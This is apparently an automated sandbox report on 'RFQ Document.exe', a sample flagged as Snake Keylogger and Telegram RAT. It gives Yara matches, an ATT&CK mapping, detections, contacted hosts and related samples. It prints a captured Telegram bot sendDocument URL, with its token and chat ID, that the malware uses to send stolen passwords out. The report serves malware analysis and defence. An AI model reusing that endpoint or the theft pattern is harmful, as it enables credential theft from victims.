Source: Yara match	File source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RFQ Document.exe PID: 2628, type: MEMORYSTR

Remote Access Functionality:

Yara detected Snake Keylogger

Show sources

Source: Yara match	File source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, type: MEMORY

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RFQ Document.exe PID: 2628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RFQ Document.exe PID: 6484, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection112	Disable or Modify Tools1	OS Credential Dumping2	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Web Service1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information1	LSASS Memory	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	System Information Discovery26	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Encrypted Channel11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing31	NTDS	Security Software Discovery21	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Non-Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection112	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol14	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Network Configuration Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
RFQ Document.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.RFQ Document.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
2.1.RFQ Document.exe.400000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
2.2.RFQ Document.exe.4940000.5.unpack	100%	Avira	HEUR/AGEN.1106066	Download File
2.2.RFQ Document.exe.400000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
1.2.RFQ Document.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
2.0.RFQ Document.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://freegeoip.app/xml/	0%	URL Reputation	safe
https://api.telegram.orgD81lT8	0%	Avira URL Cloud	safe
https://api.telegram.orgD81lL-	0%	Avira URL Cloud	safe
https://api.telegram.orgD81lda0	0%	Avira URL Cloud	safe
http://schemas.m	0%	URL Reputation	safe
https://api.telegram.orgD81lLc	0%	Avira URL Cloud	safe
https://api.telegram.orgD81lD	0%	Avira URL Cloud	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://api.telegram.org41lX	0%	Avira URL Cloud	safe
https://api.telegram.orgD81l$U	0%	Avira URL Cloud	safe
https://api.telegram.orgD81l$T	0%	Avira URL Cloud	safe
https://api.telegram.orgD81ll	0%	Avira URL Cloud	safe
https://api.telegram.orgD81lT~	0%	Avira URL Cloud	safe
https://api.telegram.orgD81l4	0%	Avira URL Cloud	safe
https://api.telegram.orgD81lt	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://api.telegram.orgD81ldb	0%	Avira URL Cloud	safe
https://api.telegram.orgD81l(	0%	Avira URL Cloud	safe
https://api.telegram.orgD81lLH	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://freegeoip.app/xml/84.17.52.39	0%	Avira URL Cloud	safe
https://api.telegram	0%	Avira URL Cloud	safe
https://freegeoip.app41l	0%	Avira URL Cloud	safe
https://api.telegram.orgD81l	0%	Avira URL Cloud	safe
https://api.telegram.orgD81lDP	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
freegeoip.app	172.67.188.154	true	false	unknown
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	unknown
clientconfig.passport.net	unknown	unknown	true	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake	false		high
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://freegeoip.app/xml/84.17.52.39	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://freegeoip.app/xml/	RFQ Document.exe, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.orgD81lT8	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgD81lL-	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.telegram.orgD81lda0	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.m	RFQ Document.exe	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	RFQ Document.exe, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp	false		high
https://api.telegram.orgD81lLc	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgD81lD	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	RFQ Document.exe, 00000002.00000002.926600469.0000000002461000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org41lX	RFQ Document.exe, 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgD81l$U	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://nsis.sf.net/NSIS_ErrorError	RFQ Document.exe	false		high
https://api.telegram.orgD81l$T	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.telegram.orgD81ll	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgD81lT~	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.telegram.orgD81l4	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgD81lt	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	RFQ Document.exe	false		high
https://api.telegram.orgD81ldb	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgD81l(	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.telegram.orgD81lLH	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	RFQ Document.exe, 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram	RFQ Document.exe, 00000002.00000003.861059471.0000000002A86000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://freegeoip.app41l	RFQ Document.exe, 00000002.00000002.926634482.00000000024A7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgD81l	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgD81lL	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RFQ Document.exe, 00000002.00000002.926600469.0000000002461000.00000004.00000001.sdmp	false		high
https://api.telegram.orgD81lDP	RFQ Document.exe, 00000002.00000002.929106581.0000000005EFE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp, RFQ Document.exe, 00000002.00000003.861005087.0000000002A7A000.00000004.00000001.sdmp	false		high
https://api.telegram.orgD81lT	RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	false		unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.67.188.154	freegeoip.app	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491944
Start date:	28.09.2021
Start time:	07:57:01
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	RFQ Document.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@5/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 23.7% (good quality ratio 15.3%) Quality average: 54.2% Quality standard deviation: 43.8%
HCA Information:	Successful, ratio: 82% Number of executed functions: 117 Number of non-executed functions: 59
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.203.80.193, 13.107.246.254, 96.16.150.73, 13.107.3.254, 52.113.196.254, 20.82.210.154, 23.211.6.115, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.112.88.60, 20.82.209.183, 80.67.82.235, 80.67.82.211 Excluded domains from analysis (whitelisted): s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, msagfx.live.com-6.edgekey.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, t-ring.msedge.net, s-ring.s-9999.s-msedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, s-9999.s-msedge.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, teams-ring.teams-9999.teams-msedge.net, t-ring.t-9999.t-msedge.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/491944/sample/RFQ Document.exe

Simulations

Behavior and APIs

Time	Type	Description
07:58:09	API Interceptor	2x Sleep call for process: RFQ Document.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
132.226.8.169	FACTURA POR DOCUMENTO_PDF_.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	#Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Pendants.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	DHL Awb_ Docs 5544834610_pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	NS. ORDINE N. 141.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Yeni sipari#U015f _WJO-001, pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	quotation.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	jxTv73rSIY.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	IMPORTS INVOICE.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	PO No. SMC -458964-005.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Quotation -Scan001_No- 9300340731.doc.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	product portolio.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	r1DQMRFhNghY3LC.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	eFatura KontrolEXD2021000000173.pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	RFQ NO 97121533- UNPLANED PR OGI 3214 - VALVES(FP 4333-17) pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Drawing and Specification.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	1tkcPigLWj.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	SCANNED DOCUMENT 00001.rtf	Get hash	malicious	Browse	checkip.dyndns.org/
	order_list.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	new order.exe	Get hash	malicious	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.telegram.org	TT09876545678T8R456.exe	Get hash	malicious	Browse	149.154.167.220
	01_extracted.exe	Get hash	malicious	Browse	149.154.167.220
	Order_0178PDF.exe	Get hash	malicious	Browse	149.154.167.220
	ZNoKWifQwj.exe	Get hash	malicious	Browse	149.154.167.220
	DHL Air Waybill NO_10019272778.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	MfHRwz3hGD.exe	Get hash	malicious	Browse	149.154.167.220
	2acrvok36Y.exe	Get hash	malicious	Browse	149.154.167.220
	Atlasship_O2ASV706248.exe	Get hash	malicious	Browse	149.154.167.220
	TT09876545678T8R456.exe	Get hash	malicious	Browse	149.154.167.220
	TT3456522345.exe	Get hash	malicious	Browse	149.154.167.220
	kundeserv.exe	Get hash	malicious	Browse	149.154.167.220
	dhl.exe	Get hash	malicious	Browse	149.154.167.220
	6MC579H2Rk.exe	Get hash	malicious	Browse	149.154.167.220
	temp order.exe	Get hash	malicious	Browse	149.154.167.220
	PO.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.2591.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetect.malware1.22628.exe	Get hash	malicious	Browse	149.154.167.220
	bGnjv3RdRI.exe	Get hash	malicious	Browse	149.154.167.220
	hSqkX3ZIw4.exe	Get hash	malicious	Browse	149.154.167.220
	pF4vlHFijX.exe	Get hash	malicious	Browse	149.154.167.220
freegeoip.app	FACTURA POR DOCUMENTO_PDF_.exe	Get hash	malicious	Browse	172.67.188.154
	hqMneZDbE6m33i1.exe	Get hash	malicious	Browse	104.21.19.200
	o6U6dMCbP3.exe	Get hash	malicious	Browse	104.21.19.200
	Invoice M470031261, M470031262, M470031263.exe	Get hash	malicious	Browse	172.67.188.154
	Payment Confirmation TT reference po.exe	Get hash	malicious	Browse	172.67.188.154
	GU#U00cdA DE CARGA...exe	Get hash	malicious	Browse	104.21.19.200
	TT09876545678T8R456.exe	Get hash	malicious	Browse	104.21.19.200
	01_extracted.exe	Get hash	malicious	Browse	104.21.19.200
	SOA.exe	Get hash	malicious	Browse	172.67.188.154
	S.O.A.exe	Get hash	malicious	Browse	172.67.188.154
	LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exe	Get hash	malicious	Browse	104.21.19.200
	#U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exe	Get hash	malicious	Browse	172.67.188.154
	DHL NOTIFICATIONS.exe	Get hash	malicious	Browse	172.67.188.154
	DHL NOTIFICATION.exe	Get hash	malicious	Browse	172.67.188.154
	#Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exe	Get hash	malicious	Browse	172.67.188.154
	2acrvok36Y.exe	Get hash	malicious	Browse	172.67.188.154
	Exodus.exe	Get hash	malicious	Browse	104.21.19.200
	Pendants.exe	Get hash	malicious	Browse	172.67.188.154
	09876567824567890987654.exe	Get hash	malicious	Browse	104.21.19.200
	DHL Awb_ Docs 5544834610_pdf.exe	Get hash	malicious	Browse	172.67.188.154

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	CPHB7Z2buG.exe	Get hash	malicious	Browse	149.154.167.99
	aylGgMNibQ.exe	Get hash	malicious	Browse	149.154.167.99
	V3fm0d84mp.exe	Get hash	malicious	Browse	149.154.167.99
	Aqlmlmmeey.exe	Get hash	malicious	Browse	149.154.167.99
	6lGJNtdKHt.exe	Get hash	malicious	Browse	149.154.167.99
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse	149.154.167.99
	xx2wsaL3cJ.exe	Get hash	malicious	Browse	149.154.167.99
	75fcGkVO1k.exe	Get hash	malicious	Browse	149.154.167.99
	8aAG42oIjb.exe	Get hash	malicious	Browse	149.154.167.99
	Zq0u07ZGkg.exe	Get hash	malicious	Browse	149.154.167.99
	jUV82t8dgh.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	149.154.167.99
	31cGYywxgy.exe	Get hash	malicious	Browse	149.154.167.99
	pAWNholT8X.exe	Get hash	malicious	Browse	149.154.167.99
	TT09876545678T8R456.exe	Get hash	malicious	Browse	149.154.167.220
	OARirszNK2.exe	Get hash	malicious	Browse	149.154.167.99
	rbQe356Ces.exe	Get hash	malicious	Browse	149.154.167.99
	01_extracted.exe	Get hash	malicious	Browse	149.154.167.220
	kzSWxYLY4H.exe	Get hash	malicious	Browse	149.154.167.99
	Order_0178PDF.exe	Get hash	malicious	Browse	149.154.167.220
UTMEMUS	FACTURA POR DOCUMENTO_PDF_.exe	Get hash	malicious	Browse	132.226.8.169
	o6U6dMCbP3.exe	Get hash	malicious	Browse	132.226.247.73
	TT09876545678T8R456.exe	Get hash	malicious	Browse	132.226.247.73
	LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exe	Get hash	malicious	Browse	132.226.247.73
	#Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exe	Get hash	malicious	Browse	132.226.8.169
	Pendants.exe	Get hash	malicious	Browse	132.226.8.169
	IH8yGKHMaA	Get hash	malicious	Browse	132.226.89.226
	DHL Awb_ Docs 5544834610_pdf.exe	Get hash	malicious	Browse	132.226.8.169
	NS. ORDINE N. 141.exe	Get hash	malicious	Browse	132.226.8.169
	KLC45E_92421_PI.exe	Get hash	malicious	Browse	132.226.247.73
	Yeni sipari#U015f _WJO-001, pdf.exe	Get hash	malicious	Browse	132.226.8.169
	3456787654567.exe	Get hash	malicious	Browse	132.226.247.73
	quotation.exe	Get hash	malicious	Browse	132.226.8.169
	Inquiry.exe	Get hash	malicious	Browse	132.226.247.73
	24678987650976500654.exe	Get hash	malicious	Browse	132.226.247.73
	REMITTANCE-54324.exe	Get hash	malicious	Browse	132.226.247.73
	jxTv73rSIY.exe	Get hash	malicious	Browse	132.226.8.169
	Order 20200822......PDF.exe	Get hash	malicious	Browse	132.226.247.73
	IMPORTS INVOICE.exe	Get hash	malicious	Browse	132.226.8.169
	PO No. SMC -458964-005.exe	Get hash	malicious	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	REQUEST FOR QUOTATION.exe	Get hash	malicious	Browse	172.67.188.154
	FACTURA POR DOCUMENTO_PDF_.exe	Get hash	malicious	Browse	172.67.188.154
	hqMneZDbE6m33i1.exe	Get hash	malicious	Browse	172.67.188.154
	o6U6dMCbP3.exe	Get hash	malicious	Browse	172.67.188.154
	Invoice M470031261, M470031262, M470031263.exe	Get hash	malicious	Browse	172.67.188.154
